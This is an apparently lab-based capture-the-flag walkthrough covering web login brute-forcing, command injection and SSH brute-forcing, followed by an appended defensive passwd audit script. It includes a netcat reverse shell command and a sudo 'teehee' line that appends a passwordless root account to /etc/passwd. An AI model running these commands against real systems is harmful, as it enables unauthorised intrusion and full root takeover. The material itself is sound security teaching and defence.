Table of Contents
Information gathering
Host discovery
Port scan
Vulnerability discovery and exploitation
Visit port 80:
There is a login box, and the user name admin is also given. Brute-forcing the password gives: happy. Log in.
There is a page that can execute commands:
Capture the request packets and modify them:
There is a command execution vulnerability.
Reverse shell
nc -e /bin/bash ip address port
Three users were found in the home directory:
Open these three directories in turn:
Only the jim directory has files:
Found after opening:
Open the file; it may be a password file.
Use hydra to brute-force SSH:
Use ssh to connect:
Privilege escalation
There is an email in the /var/mail/ directory. Opening it gives the account password of Charles.
Switch to this user and view the sudo commands that can be executed:
teehee -a can append content to a file. Use:
echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
This adds a user with root privileges to /etc/passwd, with a blank password.
Switch user:
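A defender-side check for the change made above, as an added example that is not part of the original write-up: it scans a passwd-format file for a UID 0 account other than root and for an empty password field, the two conditions the appended line creates. The sample file contents (including the UIDs and GECOS fields for jim and charles) are constructed for illustration, and the function names are this example's own.

```shell
#!/bin/sh
# Added example: audit a passwd-format file for rogue root-equivalent accounts.

# Constructed sample: ordinary entries plus the line the walkthrough appends.
sample_passwd() {
    cat <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
jim:x:1002:1002:Jim,,,:/home/jim:/bin/bash
charles:x:1001:1001:Charles,,,:/home/charles:/bin/bash
admin::0:0:::/bin/bash
EOF
}

# audit_passwd [FILE]
# Prints one finding per line; returns 1 if anything was flagged, 0 if clean.
# Defaults to /etc/passwd when no file is given.
audit_passwd() {
    awk -F: '
        $0 == "" || /^#/ { next }              # skip blank lines and comments
        NF != 7 {                              # passwd entries have 7 fields
            printf "MALFORMED line %d\n", NR; bad = 1; next
        }
        # Any account with UID 0 is root-equivalent, whatever its name.
        $3 == 0 && $1 != "root" {
            printf "UID0 %s (line %d)\n", $1, NR; bad = 1
        }
        # An empty second field means no password is required at all
        # ("x" would defer to /etc/shadow).
        $2 == "" {
            printf "EMPTY_PASSWORD %s (line %d)\n", $1, NR; bad = 1
        }
        END { exit (bad ? 1 : 0) }
    ' "${1:-/etc/passwd}"
}

# Demo run against the constructed sample.
tmp=$(mktemp)
sample_passwd > "$tmp"
audit_passwd "$tmp" || echo "findings reported for $tmp"
rm -f "$tmp"
```

The underlying fix is in sudoers: a rule that lets a user run a file-appending tool such as teehee as root is equivalent to granting root, so it should be removed rather than only monitored.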
Summary
New knowledge: the teehee privilege escalation method.